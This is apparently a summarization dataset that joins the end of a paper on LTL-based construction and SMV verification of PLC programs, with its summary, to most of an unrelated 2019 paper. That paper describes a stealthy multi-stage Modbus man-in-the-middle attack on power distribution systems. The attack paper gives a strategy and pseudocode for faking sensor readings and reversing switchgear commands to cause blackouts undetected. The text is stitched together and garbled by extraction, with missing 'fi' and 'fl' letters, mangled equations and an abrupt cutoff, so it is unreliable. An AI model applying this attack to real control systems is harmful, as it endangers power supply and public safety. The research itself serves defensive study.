NewValExpr ; (* V+ *) ELSIF OldValCond AND FiringCond THEN V := NewValExpr ; (* V- *) END_IF. If the number of conjunctive blocks OldValCond i FiringCond i V = NewValExpr i in the LTL formulas is more than the considered two, then the number of alternative ELSIF branches will grow (by one branch per each new block). IF NOT _V AND FiringCond THEN V := 1; (* V+ *) ELSIF _V AND FiringCond THEN V : = 0; (* V -*) END_IF. In the case of programming the behavior of the V function- variable (3), we have a simple type assignment V := NewValExpr. (* V *) Each program variable must be defined in the description section (local or global) and initialized in accordance with the specification. Note that, for example, in the CoDeSys development environment [7] all variables are initialized to zero by default. In addition, we must implement the notion of the _ leading underscore pseudo-operator. In order to do that, an area for a pseudo-operator section is allocated at the end of the program. In this area, a V := V is assignment is added after the description of the behavior of all specification variables. The assignment is added for each such V variable, whose previous value was addressed as _V. The _V variable also has to be defined in the description section with the same initialization as for the V variable. Note that the approach to programming by specification that describes the reason of changing each program variable value looks very natural and reasonable, because the PLC output signal is a control signal, and changing its value usually carries an additional meaning. For example, it is important to clearly understand why an engine should be turned on/off, or some lamp must be switched on/off. Therefore, it seems quite obvious that every variable must be accompanied by two properties, one per each direction of change. It is assumed that if the conditions of the changes are not fulfilled, the variable retains its previous state. V. BUILDING AN SMV- MODEL BY SPECIFICATION We consider the Cadence SMV [12] verifier as a software tool of correctness analysis by means of model checking method. After a specification has been created, it is proposed 17 17 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:45 UTC from IEEE Xplore. Restrictions apply. that a Kripke structure model in the SMV language be built that would further verify that the common program properties for this model are satisfied. If some common program property is not true for the model, the verifier builds an example of an incorrect path in the Kripke structure model, by means of which corrections are introduced into the specification. The PLC ST-program is built by the specification only after all the program properties have been verified and the verification has brought positive results. The means of the SMV language allow defining the variable value in the next state by using the next operator. The branching of the transition relation is provided by the nondeterministic assignment. For example, the next (V) : = {0, 1} assignment means that states and transitions to them will be generated both with the value of V =0 , and with the value of V =1 . In the SMV language, the & , | , ~ and > symbols denote the logical and , or , not , and implication, respectively. The SMV language is oriented on creating the next states of Kripke models from the current state. The initial current state of the model is the state of the program after initialization. Therefore, the specification of the behavior of the V (1) and (1 ) variables will be easier (clearer) if rewritten in the following equivalent form: V+: G(X(V>_V) X(OldValCond) X(FiringCond) X(V= NewValExpr)), V-: G(X(V<_V) X(OldValCond ) X(FiringCond ) X(V= NewValExpr )). We then get an SMV-model of the V variable behavior quire naturally by putting the next operator in conformity to the temporal X operator: case{next(OldValCond)&next(FiringCond) : next(V:=next(NewValExpr); next(OldValCond ) next(FiringCond ) : next(V):=next(NewValExpr ); default : next(V):=V;}. The default keyword stands for what must be happening by default, i.e. if conditions of the first two branches in the case block are not true. In the case of the boolean V variable specification (2) and (2 ) is converted to the following SMV-model case{ ~V&next(FiringCond ):next(V):=1; V&next(FiringCond ):next(V):=0; default :next(V:=V;}. A model of a function-variable behavior is defined simply as next(V):=next(NewValExpr) Let s now consider the specification of the behavior of a V substitution variable. In this case NewValExpr does not contain a _ pseudo-operator. This allows to rewrite the specification in the following equivalent form: V:XG(V=NewValExpr). In fact, this formula means that if the initial state of the model is not taken into account, then the V=NewValExpr equation must be true in all the other states of the model. The correctness of the XG(V=NewValExpr) formula results from the correctness of a slightly more general formula: G(V =NewValExpr). Therefore, the more general formula can be used as the constructive specification for building an SMV- model of the V substitution variable. An SMV-model is built by this specification simply in the form of an assignment V:=NewValExpr. The Cadence SMV verifier allows checking program models containing up to 59 binary variables (all variables are represented by sets of binary variables in the SMV). The substitution variables are not included in this number, i.e. only register variables and function variables are considered. VI. CONCLUSION The approach has been successfully proven on some (about a dozen) discrete logical control problems of different types with the average number of binary PLC inputs and outputs of about 30 and the total number of binary program variables of up to 59. For example, in order to exclude the possibility of bad product output in a plant, PLC program properties of conformance with the technological process of mix preparation and uninterrupted work of a hydraulic system (timely engagement of backup pumps) were verified. Also, PLC program properties of mandatory command execution for engaging an elevator cabin in a public library were tested. The verification was carried out on a PC with an Intel Core i7 2600K 3.40 GHz processor. It took the Cadence SMV verifier a mere few seconds to check the properties. Based on the results of this research, further work includes building software tools for modeling, specification, construction, and verification of PLC programs.
Summary:
The article proposes an approach to construction and verification of PLC ST-programs for discrete problems. The linear-time temporal logic LTL is used for the specification of the program behavior. Programming is carried out in the ST (Structured Text) language, according to the LTL-specification. The correctness analysis of the LTL-specification is performed by Cadence SMV, a symbolic model checking tool. A new approach to programming and verification of PLC ST-programs is illustrated. For each discrete problem, we propose creating an ST-program, its LTL-specification, and an SMV-model.
|
Summarize:
INDEX TERMS Industrial control systems, multi-stage semantic attacks, state transition, stealthy attacks. I. INTRODUCTION Nowadays, Industrial control systems (ICS) [1] play a quite important role in a variety of industrial processes, such as manufacturing, public facilities (e.g., buildings and airports), power generation and distribution [2][4], chemical process- ing [5], water treatment [6], oil and gas transportation [7], or large-scale communication [8]. The rapid development of Internet Technology (IT) facilitates ICS to realize remote process control and intelligent decision making. However, high exposure to open networks has made ICS an attrac- tive target for malicious attackers [9], [10]. The summer of 2010 was a landmark to ICS security. By that time the The associate editor coordinating the review of this manuscript and approving it for publication was Zhen Ling.core control program of the Natanz uranium enrichment base in Iran was infected by an unprecedented sophisticated cyber worm called ``Stuxnet''. The centrifuge for uranium enrichment was forced to accelerate unconventionally and was eventually damaged, which caused a huge loss to the entire nuclear plant. In 2015, the notorious Trojan malware ``BlackEnergy3'' attacked the Ukrainian power grid. False commands sent to relays triggered unconventional circuit dis- connections, immediately followed by a large-scale blackout. At Black Hat 2017 [11], Dr. Staggs pointed out that cyber and physical attacks can invade the programmable automa- tion controllers and OPC (OLE for Process Control) servers easily by exploiting the wind farm design and implementation aws. Additionally, they designed corresponding attack tools to launch attacks on actual wind farms. So many ICS security VOLUME 7, 2019This work is licensed under a Creative Commons Attribution 4.0 License. For more information, see http://creativecommons.org/licenses/by/4.0/156871 Y. Hu et al. : Enhanced Multi-Stage Semantic Attack Against ICS incidents indicate that ICS security has become a critical global issue [12], [13]. Intrusion Detection Systems (IDS) provide a promising solution for protecting ICS [14], [15]. IDS are a type of software designed to nd indications that information sys- tems have been compromised. Traditional intrusion detec- tion technology is mainly classi ed into two categories, signature-based and anomaly-based. Signature-based IDS, also called misuse-based, build a blacklist containing the sig- natures of known attacks, and raise alarms when the system behavior matches any of these signatures. Anomaly-based IDS are mainly used to detect anomalies that violate the nor- mal behavior patterns of a target system. Therefore, a normal behavior model of the target system should be constructed. Model parameters can be learnt from unaffected system operating data. While applying intrusion detection to ICS, the industrial process data (e.g., measurement data and con- trol instructions) is another important factor to consider [16]. If the value of a process variable is outside its normal range or breaks the fundamental laws of nature, an alarm should be raised. Exiting intrusion detection technology is proved to be useful but not omnipotent. Recently, Kleinmann et al. [17] have proposed a multi-stage semantic attack against ICS. This attacker can drive the target system to a critical state by reversing the semantic meaning of control instructions and presenting a fake view of measurement data to the system operator at the same time. However, the attacker cannot guarantee to realize the attack goal, since it just ran- domly chooses some instructions to reverse. In this work, we design an enhanced and strategic multi-stage semantic attack against ICS, which relies on the system state transition rules to precisely decide which control instructions to reverse. The enhanced semantic attack can signi cantly improve the attack success rate while maintaining its stealthiness. The key contributions of this work are summarized as followsV We analyze the relationships between system states and control instructions, and build a system state transi- tion graph that can accurately characterize the dynamic behavior of ICS. We design an enhanced multi-stage semantic attack against ICS. By exploiting system state transition rules, the attacker can develop accurate attack strate- gies, which can increase the attack success rate signi cantly. We launch the enhanced multi-stage semantic attack on a simulated industrial control system to verify its stronger attack ability compared to the existing semantic attack. The rest of the paper is organized as follows. We introduce the research literature about intrusion detection in Section II. Some preliminaries of the enhanced semantic attack are pre- sented in Section III. In Section IV, we elaborate on the prin- ciples of the enhanced multi-stage semantic attack against ICS. Experiments are conducted in Section V to verify thestronger attack ability of the enhanced multi-stage semantic attack. Finally, a conclusion is drawn in Section VI. II. RELATED WORK Due to the growing openness of ICS, cyber attacks against traditional information systems also threaten the security of ICS. Traditional intrusion detection technology mainly fall into two classes: signature-based and anomaly-based. The former mainly relies on the accurate signatures of malicious attacks. System behavior that matches any existing attack signature is considered anomalous. On the contrary, the latter depends on a normal behavior model. Any system behav- ior that deviates from this model should be agged as an anomaly. Generally speaking, attacks against ICS usually violate protocol speci cations or cause abnormal network traf cs, and the physical constraints of ICS are likely to be broken during attack. Therefore, we introduce the intrusion detection technology on ICS from three aspects: network protocol analysis, network traf c mining, and process data analysis. A. NETWORK PROTOCOL ANALYSIS-BASED INTRUSION DETECTION Network protocols de ne a set of rules to specify how net- work devices should format, transmit and process informa- tion. Therefore, intrusion detection rules can be extracted from network protocols. Any system behavior that violates the detection rules is judged to be abnormal. Some open protocols are commonly used in ICS communication, e.g., ModBus, DNP3, ICCP/TASE.2. These protocols are vulner- able to a variety of malicious attacks such as eavesdrop- ping, tampering and counterfeiting, since ICS were designed to run in relatively closed environments and security was rarely considered in the design of industrial communication protocols. Cheung et al. [18] extracts a normal system behavior model from the industrial protocol speci cations. The model formalizes legal data values and legal relationships between different data elds. Furthermore, a set of communication modes are built according to data transmission ports, trans- mission directions and security requirements of ICS. Any behavior that violate the normal behavior model or the communication modes should be agged as an anomaly, so this detection technique also belongs to the anomaly-based intrusion detection. Morris et al. [19] construct signatures for ModBus protocol vulnerabilities by exploiting a famous intrusion detection system Snort . Communication data that matches any of these signatures is identi ed as an anomaly. Moreover, traditional IDS can be tailored or improved for intrusion detection on ICS. Lin et al. [20] successfully realize intrusion detection on ICS by implanting a DNP3 protocol parser into Bro, a network intrusion detection system devel- oped by the University of Berkeley. In addition to open protocols, proprietary protocols also play an important part in ICS communication. IDS based on proprietary protocol analysis has emerged. Hong et al. [21] 156872 VOLUME 7, 2019 Y. Hu et al. : Enhanced Multi-Stage Semantic Attack Against ICS extract speci cations from the IEC 61850 standards (e.g., Generic Object Oriented Substation Event (GOOSE) and Sample Value technology (SV)), based on which to identify abnormal or malicious behaviors in electric power substations. In [22], legal and illegal network traf c patterns are de ned based on the protocol speci cations of power systems. These patterns are further converted into Snort rules for intrusion detection. As described above, intrusion detection based on network protocol analysis mainly relies on the accurate de nition of detection rules, and usually yields a high false alarm rate and incurs a large message-parsing time overhead. Intrusion detection based on network traf c mining can overcome these shortcomings to some extent. B. NETWORK TRAFFIC MINING-BASED INTRUSION DETECTION Most ICS have xed business logics, static and simple net- work topologies, and a small number of programs. There- fore, traf cs in industrial networks are stable in most cases. Unusual traf c patterns generally indicate the occurrence of an anomaly, which is the main motivation of the network traf c mining-based intrusion detection. Traditional IDS based on network traf c mining [23] mainly rely on the analysis of network meta data, includ- ing IP addresses (i.e., source IP address for outbound packets and destination IP address for inbound packets), transmission ports, traf c durations, and packet intervals. Applying data mining techniques to network meta data can identify system anomalies effectively. Supervised [24] and semi-supervised [25] clustering, single-class [26] or multi-class [27] support vector machine, mixed Gaussian model [28], fuzzy logic [29][31], neural network [32], [33] and deep learning [34] are commonly used techniques for traf c mining. These techniques aim to model the non-linear relationships between network traf cs and system behaviors. The relationship model and real-time traf c data are used to investigate the current status of the system, and then detect malicious attacks timely. However, analyzing a large number of traf c features undoubtedly incurs a high computational overhead. Therefore, techniques like principal component analysis [35] and ant colony optimization [36] are used to remove redundant traf c features, thus to reduce computa- tional overhead. Intrusion detection techniques based on protocol analysis and traf c mining are borrowed from the traditional network intrusion detection domain. They are mainly designed for conventional information systems. A big difference between ICS and the traditional information systems (i.e., ICS are closely related to the physical world) makes these techniques dif cult to identify attacks against physical processes, since these attacks may not violate network protocol speci ca- tions or cause abnormal network traf cs. Hence, the intru- sion detection technology based on process data analysis has emerged.C. PROCESS DATA ANALYSIS-BASED INTRUSION DETECTION Industrial process data is another important information source for intrusion detection on ICS. It is likely for a system operator to make wrong decisions [37] if the process data is secretly counterfeited or tampered with, and eventually cause lethal damage to ICS. Generally, the deviation between the observed and expected process values can determine whether an attack has occurred [38]. In [39], all process variables are divided into three classes: constants, enumeration, and con- tinuous values. Each process variable has a normal behavior pattern. Once the monitored value of a process variable does not conform to its normal behavior pattern, an alarm is raised. In [40], system states are denoted by measurement data reported by a group of remote sensors, and a corresponding state distance measurement method is presented. Anomalies can be detected by inspecting the distance between the current state and the critical states. Time series forecasting provides another potential solution for intrusion detection on ICS. This technology can precisely predict the future outputs of ICS, which are then compared with the monitored outputs to generate residuals. By applying proper statistical techniques to the residuals, IDS can detect malicious attacks effectively. In general, the residual series conforms to a Gaussian distribution during normal operation of ICS. If an attack occurs, there will be a signi cant deviation between the actual and expected system behaviors, i.e., the residuals deviate from 0 notably [41]. Two kinds of intrusion detection techniques based on residual analysis are summa- rized in [42]: sequential detection and change detection. The rst technique can identify anomalies as quickly as possible. In other words, it determines the shortest residual sequence based on which IDS can make a judgement. The second technique identi es an anomaly if the residual [43] or the cumulative residual [16] exceeds a prede ned threshold at a certain time point. Recently, Kleinmann et al. [17] propose a multi-stage semantic attack against ICS by tampering with the mea- surement data and the control instructions simultaneously. They state that the Modbus protocol has no security protec- tion mechanism or message integrity protection mechanism, which opens up a back door for malicious attackers. This vulnerability enables the adversary to reverse the semantic meaning of control instructions and present a fake view of measurement data to the HMI at the same time. However, this attack is sometimes futile, because it cannot exactly decide which control instructions to manipulate. Randomly reversing some instructions cannot guarantee to realize the attack goal. In this work, we design an enhanced multi-stage semantic attacks against ICS, which makes full use of the system state transition rules and strategically decides which control instructions to reverse, thus to bring the target system into dangerous situations precisely. The enhanced semantic attack is totally undetectable by traditional IDS because all process values are legal during this attack. Additionally, it can improve the attack success rate signi cantly when compared VOLUME 7, 2019 156873 Y. Hu et al. : Enhanced Multi-Stage Semantic Attack Against ICS FIGURE 1. The Electricity Distribution Subsystem (Following [17]). to the existing instruction-reversing semantic attack proposed in [17]. III. PRELIMINARIES In this section, we present some preliminaries of the enhanced semantic attack, including the communication mechanism of Modbus, the architecture of the electrical distribution systema typical industrial system, and the underlying adversary model. A. MODBUS ModBus is a de facto application layer protocol for ICS. This protocol supports a master-slave communication mode between different control devices, even if they are within different types of buses or networks. Most Modbus sys- tems use TCP as the communication layer protocol. A Mod- bus/TCP message is embedded in TCP segments and TCP port 502 is reserved for Modbus communications. In Mod- bus communications, usually the HMI acts as the unique master and the remote PLCs act as slaves. In a trans- action, the master requests process data from the slaves or issues control instructions to the slaves. The slaves respond by sending the requested data to the master or by performing the control instructions. The request mes- sage from the master contains a unique transaction ID, which should be contained in the corresponding response message. A Modbus Protocol Data Unit (PDU) consists of two elds: a single-byte Function code and a variable-size Payload (lim- ited to 252 bytes). The Function code speci es the operation to be taken, and the Payload contains parameters required by the function invocation. For example, the Payload of a read request consists of two elds, a reference number and a bit/word count. The former speci es the starting memory address for reading. The latter speci es the number of mem- ory object units to be read. The payload of the corresponding response message is comprised of two parts: byte count and data, which respectively record the length of data in bytes and the data contents that were read. In addition to the startingmemory address, the payload of a write message has another eld that speci es the data to be written. Unfortunately, Modbus has little ability to defend itself against malicious attacks, e.g., data tampering or counterfeit- ing. Moveover, Modbus only uses TCP sequence numbers to provide simple session semantics, but cannot ensure message integrity or long-term session semantics. Therefore, TCP session hijacking becomes quite straightforward. B. ELECTRICITY DISTRIBUTION SYSTEM An electricity supply chain is typically comprised of three subsystems: generation, transmission, and distribution, as illustrated in Fig. 1. The transmission network connects the generation system with the distribution system. Elec- tricity is transmitted from generation sites to remote dis- tribution substations along high-voltage transmission lines. The high voltage (138 kV to 765 kV) is then converted to medium-voltage (600V to 35kV) by substation transform- ers. A group of medium-voltage circuits fan out from the substation. The medium voltage is further stepped down to the low voltage (commonly 120/240V) by the distribution transformers close to end users. In this work, we mainly discuss the distribution subsystem between the substations and distribution transformers, which is the target system of the ``BlackEnergy" cyber-attack. In order to improve reliability, distribution circuits are usu- ally equipped with ``tie switches'' (also called switchgears, which are normally disconnected) to other circuits. If one of the circuits encounter an unintentional fault, it will be connected to another circuit by an adjacent switchgear. Thus, electricity ows into the faulted circuit and some necessary services are restored. The switchgears can be operated auto- matically or manually from the HMI. A simpli ed model of the subsystem is shown in Fig. 2. Two medium-voltage circuits fan out from the substation. There are six PLCs (i.e., PLC01PLC06) along the top circuit and four PLCs (i.e., PLC08PLC11) along the bottom circuit. Addi- tionally, the two distribution lines are interconnected by a normally open switchgear that is controlled by PLC07. 156874 VOLUME 7, 2019 Y. Hu et al. : Enhanced Multi-Stage Semantic Attack Against ICS FIGURE 2. The Electricity Distribution Subsystem. C. ADVERSARY MODEL In the adversary model, we suppose that the attacker can penetrate into the control network and launch a Man-In-The- Middle (MITM) attack between the HMI and remote PLCs. On the hijacked communication link, all network packets can be eavesdropped, replayed, delayed or deleted before reach- ing their destinations. Furthermore, the attacker can modify the packet contents and even take over the HMI to fabricate malicious control instructions. The goal of the adversary is to disrupt the normal operation of ICS and cause fatal damages to the physical system. Furthermore, suppose that the adversary has gained suf - cient knowledge of the ICS architecture, the industrial pro- cess and the way to manipulate the target system. Here, we use a somewhat weaker type of attack model: the attacker can penetrate into the control network, and launch MITM attacks on one or more HMI-PLC communication links simultaneously. However, this model is assumed to be state- less, i.e., it does not tamper with TCP sequence numbers. Therefore, this model cannot delete existing messages or inject fake ones. It can only manipulate the contents of exist- ing packets. IV. ENHANCED MULTI-STAGE SEMANTIC ATTACK In this section, we elaborate on the strategy of the enhanced multi-stage semantic attack against ICS. A. DEFINITION OF SYSTEM STATES Suppose that an electricity distribution subsystem involves a set of con gurable state variables that is denoted by fx1,x2,: : :,xNg, where Nis the total number of state variables, andxi2f1; 1g(1iN) is the ith state variable, which denotes the status (closed or open) of the ith switchgear. Hence, a state vector xcan be used to represent the status of the entire system at a certain time point V xD(x1;x2; : : : ; xN); (1) All possible values of the state vector xconstitute a set X. In the electricity distribution subsystem, Xis comprised of three mutually exclusive subsets, a normal state set N, a fault state set Fand a critical state set C. The normal states in N indicate that the system is operating normally. If there occursome unavoidable disturbance or system faults, the system enters a fault state contained in Fto restore some necessary services and nally return to the normal state. However, if the system encounters some malicious attacks, it will be brought into some dangerous or unwanted situations (i.e., critical states), like large-scale blackouts. The normal state set Nof the electricity distribution sys- tem is formalized as follows V NDfxNor1;xNor2; : : : ; xNor Lg; (2) where NX,Lis the total number of the normal state vectors, and xNor l(1lL) is the lth normal state vector, which consists of the values of Nstate variablesV xNor lD(xNor l 1;xNor l 2; : : : ; xNor l N): (3) Analogously, the fault state set and critical state set are de ned byV FDfxFau1;xFau2; : : : ; xFauKg; (4) and CDfxCri1;xCri2; : : : ; xCriMg; (5) where FandCare two subsets of X(i.e.,FX, CX),KandMare the numbers of fault states and critical states, respectively. Furthermore, the fault state vector and the critical state vector are de ned by V xFaukD(xFauk 1;xFauk 2; : : : ; xFauk N); (6) and xCrimD(xCrim 1;xCrim 2; : : : ; xCrim N): (7) where xFauk i(1kKand 1iN) denotes the ith entry of the kth fault state vector, and xCrim j(1mM and 1jN) denotes the jth entry of the mth critical state vector. The three subsets N,FandCare mutually exclusive and together constitute the entire state set X, i.e.,N\FD N\CDF\CD?andN[F[CDX. B. SYSTEM STATE TRANSITION Based on the de nition of system states, we now de ne the state transition rules. Suppose that the system operator can con gure the target system manually, i.e., issue the ``open'' or ``close'' instructions to change the status of switchgears. Therefore, we use a variable a2f 1;1;0gto denote differ- ent operations the system operator can take on a switchgear. The values 1, 1, and 0 represent the ``open'', ``close'' and no action, respectively. Suppose that there are Noperable switchgears in the system, corresponding to Ncon gurable state variables mentioned above. A N-tuple vector aD (a1;a2; : : : ; aN) is used to represent all operations taken by the system operator at a certain time point. Each entry ai2f 1;1;0gdenotes the operation taken on the ith state variable xi. State transition rules describe how the system behavior changes over time. We use xi(t) and xi(tC1) to denote VOLUME 7, 2019 156875 Y. Hu et al. : Enhanced Multi-Stage Semantic Attack Against ICS FIGURE 3. The System State Transition Graph. the current state and the next state of the ith switchgear, respectively. An operation ai(t) can drive xi(t) toxi(tC1), so we formalize the state transition of a swithgear as followsV xi(tC1)Dxi(t) ai(t); (8) where the operator de nes the following rule V xi(tC1)D( ai(t);if a i(t)6D0; xi(t);otherwise :(9) This equation indicates that the next state xi(tC1) is deter- mined jointly by the current state xi(t) and the current opera- tionai(t). If no operation is taken (i.e., ai(t)D0),xi(tC1) is set equal to xi(t). Otherwise, xi(tC1) is set equal to ai(t). Therefore, the state transition of the entire system can be formalized byV x(tC1)Dx(t) a(t); (10) where the state transition of each element of the state vector x follows Eq. 8. The state transition graph is illustrated in Fig. 3. A normal state transits to a fault state if some unavoidable disturbances or faults occur. A fault state can return to a nor- mal state after the necessary services are restored. However, if the target system encounters a malicious attack, it is likely to enter a critical state from a normal state or a fault state. C. ATTACK STRATEGY With the de nition of system states and state transition rules, we now describe the strategy of the enhanced multi-stage semantic attack against ICS. The attack strategy mainly con- sists of measurement data deception and control instruction manipulation. During measurement data deception, a fake view of process data is presented to the HMI, thus to induce the system operator to take some unnecessary operations. Afterwards, the issued instructions are tampered with by the attacker to achieve speci c attack goals. Below we elaborate on the two attack steps.1) MEASUREMENT DATA DECEPTION During measurement data deception, the attacker can change the measurement data, e.g., current and voltage values reported by victim PLCs, to any legitimate value, thus to bypass IDS. Suppose that the victim PLCs are those con- trolling the top line in Fig. 2 (i.e., PLC01 to PLC06). The left graph in Fig. 4 shows the actual values of the current and voltage reported by PLC01. The right graph depicts the fake values of the same measurement data presented to the HMI. When the system is attacked (from 240s to 270s), zero current and zero voltage are presented to the HMI. The fake view simulates a natural fault on the top line, so it is not regarded as a malicious attack. In other words, the attack is totally stealthy. The fake view misleads the system operator into taking uncessary remediation measures, which may be costly and harmful. Furthermore, it provides the attacker a good opportunity to manipulate the control instructions maliciously. 2) CONTROL INSTRUCTION MANIPULATION Once the system operator observes the zero current and zero voltage reported by remote PLCs for a period of time, he will drive the system to a fault state by issuing speci c control instructions. Suppose that a set of control instructions that is denoted by anl!fkis issued to change the status of one or more switchgears. At this moment, the attacker can change the vec- toranl!fkto a malicious one anl!cmbefore the instructions reach their destinations, thus bringing the system into a crit- ical state. Here, anl!fkandanl!cmare the operation vectors that can drive the system from the normal state to a fault state and a critical state, respectively. In order to bypass intrusion detection, the tampered instructions should meet the follow- ing two conditions: 1) janl!fkjDj anl!cmjand 2) anl!fk6D anl!cm, wherejaj D (jakj)1kNdenotes the vector of absolute values of a's elements. Thus, no existing instruction is dropped and no fabricated instruction is injected. Addition- ally, all instruction values remain legitimate in the tampered messages, so the attack is totally stealthy. If the attacker fails to manipulate the instructions in this step, he has another chance. When the system has restored the necessary services, it should return to the normal state from the fault state once the system operator issues the cor- responding instructions afk!nl. At this moment, the attacker can rewrite afk!nlinto a malicious vector afk!cm, in order to bring the system into a critical state. Analogously, afk!cm should satisfyjafk!nlj D j afk!cmjand afk!nl6Dafk!cm. Once the system enters a critical state, the attack goal is achieved. The entire procedure of the Enhanced Multi-Stage Seman- tic Attack (EM2SA for short) is summarized in Algorithm 1. The normal, fault and critical system state sets are used as inputs to the algorithm. The output of the algorithm is a boolean variable agthat indicates whether the seman- tic attack is successful or not. The initial value of ag is set to false, as shown in line 1. Lines 2 and 3 make 156876 VOLUME 7, 2019 Y. Hu et al. : Enhanced Multi-Stage Semantic Attack Against ICS FIGURE 4. Measurement Data Deception Attack. Algorithm 1 EM2SA Algorithm Input : The normal, fault and critical system state collections N,FandC Output : a agindicating whether the attack is successful or not 1 ag false; 2construct the state transition graph G; 3Penetrate the control network to get a Man-In-The-Middle position; 4launch the measurement data deception attack when state system2N; 5while truedo 6 tamper with the control instruction anl!fkto anl!cm, that satis esjanl!fkjDj anl!cmjand anl!fk6Danl!cm; 7 wait for the system state transition; 8 ifstate system2Cthen 9 ag true; 10 break; 11 else 12 launch the measurement data deception attack; 13 tamper with the new control instruction afk!nltoafk!cm, that satis es jafk!nljDj afk!cmjandafk!nl6Dafk!cm; 14 wait for the system state transition; 15 ifstate system2Cthen 16 ag true; 17 break; 18 end 19 end 20end 21return ag; some preparations, including building the state transition graph and getting a Man-In-The-Middle position in thecontrol network. Lines 4 to 20 are the whole procedure of the semantic attack. Line 4 launches the measurement data deception attack when the system operates normally, which presents a fake view of the measurement data to the HMI. Afterwards, the attacker tampers with the instructions issued by the system operator and waits for the system state transi- tion (lines 6 and 7). If this attack is successful (i.e., the system enters a critical state: state system2C), the output variable ag is set to trueand the attack procedure ends (lines 8 to 10). Otherwise, the attacker has another chance to manipulate the control instructions when the system is going back to the normal state, as shown in lines 11 to 19. If both the two attacks are unsuccessful, the attacking procedure should be restarted, and line 20 returns the output variable ag. V. EXPERIMENTS AND DISCUSSION In this section, we simulate the above-mentioned electricity distribution subsystem in Java language and launch two dif- ferent semantic attacks on the simulated system. The archi- tecture of the simulated ICS is depicted in Fig. 2, including a substation and two radial distribution lines, each with a group of PLCs. One virtual machine is used to simulate the HMI, which acts as the Modbus master. Other virtual machines simulate the remote PLCs, which serve as the Mod- bus slaves. On the simulated system, we launch two attacks: the enhanced multi-stage semantic attack proposed in this work and the instruction-reversing semantic attack proposed in [17], and compare the success rate of the two attacks. We present the normal current values reported by three key PLCs ( PLC01, PLC07 and PLC11) and the normal voltage value reported by PLC01 in Fig. 5. The voltage value remains stable, while the current values measured by PLC01 and PLC11 vary with the changing loads. The switchgear con- trolled by PLC07 keeps open when the system operates nor- mally, so the current reported by PLC07 is zero. Fig. 6a and Fig. 6b respectively show the fake measure- ment data presented to the HMI and the actual measurement data when the system encounters the instruction-reversing VOLUME 7, 2019 156877 Y. Hu et al. : Enhanced Multi-Stage Semantic Attack Against ICS FIGURE 5. Normal Measurement Data. FIGURE 6. The Fake and Actual Measurement Data during the Instruction-Reversing Semantic Attack [17]. semantic attack proposed in [17]. As we can see from Fig. 6a, the measurement data deception starts at 210s. After that, the system operator observes the zero current and zero voltageat PLC01 on the HMI. Therefore, the system operator issues control instructions to open the switchgear controlled by PLC01 and close the switchgear controlled by PLC07 at 240s. 156878 VOLUME 7, 2019 Y. Hu et al. : Enhanced Multi-Stage Semantic Attack Against ICS FIGURE 7. The Fake and Actual Measurement Data during the Enhanced Semantic Attack that Succeeds by One-Step Instruction Tampering. Thus the system enters a fault state and the top line begins to restore necessary services. After 240s, the HMI is still pro- vided with a fake view of the measurement data: small values of the current and voltage at PLC01, misleading the system operator into believing the system is being restored. After a period of time, the operator issues control instructions to connect the switchgear controlled by PLC01 and disconnect the switchgear controlled by PLC07 at 270s, in order to bring the system back to normal. Afterwards, the attacker shows the normal current and voltage values to the HMI, presenting an illusion that the system has returned to normal. However, the actual status of the system is shown in Fig. 6b. The attacker reverses each control instruction at 240s and 270s. In detail, the switchgears controlled by PLC01 and PLC07 are respectively closed and opened at 240s, and then respectively opened and closed at 270s. Therefore, the two switchgears maintain the status quo from 240s to 270s, and the mea- surement data are normal during this period. From 270s, the system enters a super uous fault recovery phase, so the currents at PLC01 and PLC07 and the voltage at PLC01 aresigni cantly smaller than their normal values. Therefore, the attack goal is not achieved since the system does not enter a critical state. Fig. 7 shows the fake and actual measurement data dur- ing the enhanced multi-stage semantic attack proposed in this work. Firstly, we suppose that the rst-step instruction tampering succeeds. Similar to Fig. 6a, Fig. 7a shows that the measurement data deception starts at 210s. After tam- pering with the ``fault recovery'' instructions successfully, the attacker presents the small current and voltage values to the HMI after 240s, misleading the system operator into believing the system is being restored. However, as shown in Fig. 7b, the attacker manipulates the instructions strate- gically at 240s according to Algorithm 1, i.e., reversing the instruction sent to PLC01 while keeping the instruc- tion sent to PLC07 unchanged, in order to bring the sys- tem into a critical state. Hence, the actual current and voltage at PLC01 become zero at 240s, which indicates a blackout on the top transmission line, so the attack goal is achieved. VOLUME 7, 2019 156879 Y. Hu et al. : Enhanced Multi-Stage Semantic Attack Against ICS FIGURE 8. The Fake and Actual Measurement Data during the Enhanced Semantic Attack that Succeeds by Two-Step Instruction Tampering. If the rst-step instruction tampering is unsuccessful, the attacker has another chance. As depicted in Fig. 8, the attacker fails to tamper with the control instructions at 240s, but succeeds to manipulate the instruction sent to PLC01 at 270s. Therefore, the system enters a critical state after 270s (both the current and voltage at PLC01 become zero), as shown in Fig. 8b, but the fake measurement data pre- sented to the HMI are normal after 270s, as shown in Fig. 8a. Figs. 7 and 8 indicate that there are two possible paths from the normal state to a critical state during the enhanced multi-stage semantic attack, which are represented by the two red dashed lines in Fig. 9. Specially, if the attacker can randomly choose one or more instructions to tamper with during the instruction-reversing semantic attack proposed in [17], the proposed enhanced semantic attack is a special case of that kind of attack. Addi- tionally, suppose that each instruction tampering attack has a Possibility of Failure (PoF for short). Based on the assump- tions, we compare the success rate of the two kinds of seman- tic attacks on the simulated system. The instruction-reversing semantic attack can randomly choose whether to reverse FIGURE 9. Two Attack Paths During the Enhanced Semantic Attack. an eavesdropping instruction, while the enhanced semantic attack manipulates an instruction strategically according to Algorithm 1. In this experiment, PoF varies from 0.1 to 0.9, with a step value of 0.1. For each value of PoF, we conduct 5000 simulations for each attack. The comparison of the two attacks is illustrated in Fig. 10. Obviously, the success rate of the enhanced multi-stage semantic attack is signi cantly 156880 VOLUME 7, 2019 Y. Hu et al. : Enhanced Multi-Stage Semantic Attack Against ICS FIGURE 10. Comparison of Attack Success Rates of Two kinds of Attacks. higher than that of the instruction-reversing attack, which veri es the stronger attack ability of the enhanced attack. VI. CONCLUSION In this paper, we propose an enhanced multi-stage semantic attack against ICS. During this attack, a fake view of mea- surement data is rst presented to the HMI to mislead the system operator into issuing unnecessary control instructions. Thus, the attacker has chances to manipulate the control instructions strategically according to system state transition rules, and precisely bring the target system into a critical state. In the meanwhile, the measurement data deception attack should be continued in order to conceal the on-going attack. Furthermore, this attack is totally stealthy, since the command sequences, message sizes, and process values all remain legitimate. To verify the strong attack ability of the enhanced multi-stage semantic attack, we simulate an elec- tricity distribution subsystem in Java language. Additionally, we compare the attack success rate of the enhanced semantic attack with that of the existing instruction-reversing seman- tic attack. The experimental results show 